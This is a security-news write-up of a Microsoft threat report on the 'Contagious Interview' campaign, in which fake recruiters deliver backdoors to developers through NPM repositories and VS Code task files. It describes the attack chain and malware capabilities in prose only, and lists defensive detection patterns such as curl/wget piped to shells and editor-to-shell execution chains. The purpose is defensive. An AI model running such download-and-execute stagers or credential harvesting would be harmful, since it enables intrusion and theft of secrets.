Microsoft Defender Experts has uncovered a sophisticated social engineering campaign called "Contagious Interview" that delivers malware through fake developer job interviews, exploiting the trust inherent in recruitment workflows to target software developers at enterprise solution providers and media firms.
Microsoft Defender Experts has uncovered a sophisticated social engineering campaign called "Contagious Interview" that delivers malware through fake developer job interviews, exploiting the trust inherent in recruitment workflows to target software developers at enterprise solution providers and media firms.
The Anatomy of a Fake Interview Attack
The campaign, active since at least December 2022, represents a significant evolution in initial access tradecraft. Rather than relying on traditional phishing or exploit-based techniques, threat actors have embedded targeted malware delivery directly into interview tools, coding exercises, and assessment workflows that developers inherently trust.
During periods of high motivation and time pressure, job seekers are more likely to lower their suspicion and resistance. The attackers exploit this psychological vulnerability by creating convincingly staged recruitment processes that mirror legitimate technical interviews, complete with recruiter outreach, technical discussions, assignments, and follow-ups.
Attack Chain Overview
The initial access typically begins when threat actors pose as recruiters from cryptocurrency trading firms or AI-based solution providers. Victims who fall for the lure are instructed to clone and execute an NPM package hosted on popular code hosting platforms such as GitHub, GitLab, or Bitbucket.
In recent intrusions, threat actors have adapted their technique to leverage Visual Studio Code workflows. When victims open the downloaded package in Visual Studio Code, they are prompted to trust the repository author. If trust is granted, Visual Studio Code automatically executes the repository's task configuration file, which then fetches and loads the backdoor.
A typical repository hosted on Bitbucket, posing as a blockchain-powered game.
Sample task found in the repository (right: URL shortener redirecting to vercel.app).
The Malware Arsenal
The campaign employs several sophisticated backdoors, each serving different purposes in the attack chain:
Invisible Ferret - A Python-based backdoor used in later stages of the attack chain, enabling remote command execution, extended system reconnaissance, and persistent control after initial access has been secured by the primary backdoor.
FlexibleFerret - A modular backdoor implemented in both Go and Python variants. It leverages encrypted HTTP(S) and TCP command and control channels to dynamically load plugins, execute remote commands, and support file upload and download operations with full data exfiltration. Its plugin-based architecture, layered obfuscation, and configurable beaconing behavior contribute to its stealth and make analysis more challenging.
Code Quality Observations
Interestingly, recent samples exhibit characteristics that differ from traditionally engineered malware. The beaconing agent script contains inconsistent error handling, empty catch blocks, and redundant reporting logic that appear minimally refined. Similarly, the FlexibleFerret Python variant combines tutorial-style comments, emoji-based logging, and placeholder secret key markers alongside functional malware logic.
These patterns, including instructional narrative structure and rapid iteration cycles, suggest development workflows that prioritize speed and functional output over refined engineering. While these characteristics may indicate the use of development acceleration tools, they primarily reflect evolving threat actor development practices and rapid tooling adaptation that enable quick iteration on malicious code.
Security Implications
This campaign weaponizes hiring processes into a persistent attack channel. Threat actors exploit technical interviews and coding assessments to execute malware through dependency installations and repository tasks, targeting developer endpoints that provide access to source code, CI/CD pipelines, and production infrastructure.
Threat actors harvest API tokens, cloud credentials, signing keys, cryptocurrency wallets, and password manager artifacts. Modular backdoors enable infrastructure rotation while maintaining access and complicating detection.
Mitigation and Protection Guidance
Organizations should treat recruitment workflows as attack surfaces by deploying isolated interview environments, monitoring developer endpoints and build tools, and hunting for suspicious repository activity and dependency execution patterns.
Harden Developer and Interview Workflows
Use a dedicated, isolated environment for coding tests and take-home assignments (for example, a non-persistent virtual machine). Do not use a primary corporate workstation that has access to production credentials, internal repositories, or privileged cloud sessions.
Establish a policy that requires review of any recruiter-provided repository before running scripts, installing dependencies, or executing tasks. Treat "paste-and-run" commands and "quick fix" instructions as high-risk.
Provide guidance to developers on common red flags: short links redirecting to file hosts, newly created repositories or accounts, unusually complex "assessment" setup steps, and instructions that request disabling security controls or trusting unknown repository authors.
Reduce Attack Surface from Tools Commonly Abused
Ensure tamper protection and real-time antivirus protection are enabled, and that endpoints receive security updates. These campaigns often rely on script execution and commodity tooling rather than exploiting a single vulnerability, so layered endpoint protection remains effective.
Restrict scripting and developer runtimes where possible (Node.js, Python, PowerShell). In high-risk groups, consider application control policies that limit which binaries can execute and where they can be launched from (for example, preventing developer tool execution from Downloads and temporary folders).
Monitor for and consider blocking common "download-and-execute" patterns used as stagers, such as curl/wget piping to shells, and outbound requests to low-reputation hosts used to serve payloads (including short-link redirection services).
Protect Secrets and Limit Downstream Impact
Reduce the exposure of secrets on developer endpoints. Use just-in-time and short-lived credentials, store secrets in vaults, and avoid long-lived tokens in environment files or local configuration.
Enforce multifactor authentication and conditional access for source control, CI/CD, cloud consoles, and identity providers to mitigate credential theft from compromised endpoints.
Review and restrict access to password manager vaults and developer signing keys. This campaign explicitly targets artifacts such as wallet material, password databases, private keys, and other high-value developer-held secrets.
Detect, Investigate, and Respond
Hunt for execution chains that start from a code editor or developer tool and quickly transition into shell or scripting execution (for example, Visual Studio Code/Cursor App→ cmd/PowerShell/bash → curl/wget → script execution).
Review repository task configurations and build scripts when such chains are observed.
Monitor Node.js and Python processes for behaviors consistent with this campaign, including broad filesystem enumeration for credential and key material, clipboard monitoring, screenshot capture, and HTTP POST uploads of collected data.
If compromise is suspected, isolate the device, rotate credentials and tokens that may have been exposed, review recent access to code repositories and CI/CD systems, and assess for follow-on payloads and persistence.
Detection Capabilities
Microsoft Defender XDR customers can leverage several detection capabilities to identify related activity:
- Suspicious process execution from NPM packages
- Suspicious Node.js process behavior
- Possible OtterCookie malware activity
- Suspicious Python library load
- Suspicious connection to remote service
- Enumeration of files with sensitive data
- System information discovery
- Suspicious clipboard access
Custom hunting queries are available to identify suspicious script executions, OtterCookie-related Node.js activity, possible Node.js beaconing agent activity, and credential enumeration activity.
The Contagious Interview campaign represents a sophisticated evolution in social engineering attacks, demonstrating how threat actors are increasingly targeting the trust inherent in legitimate business processes. By understanding these attack patterns and implementing appropriate defensive measures, organizations can better protect their developer ecosystems from this emerging threat.
Comments
Please log in or register to join the discussion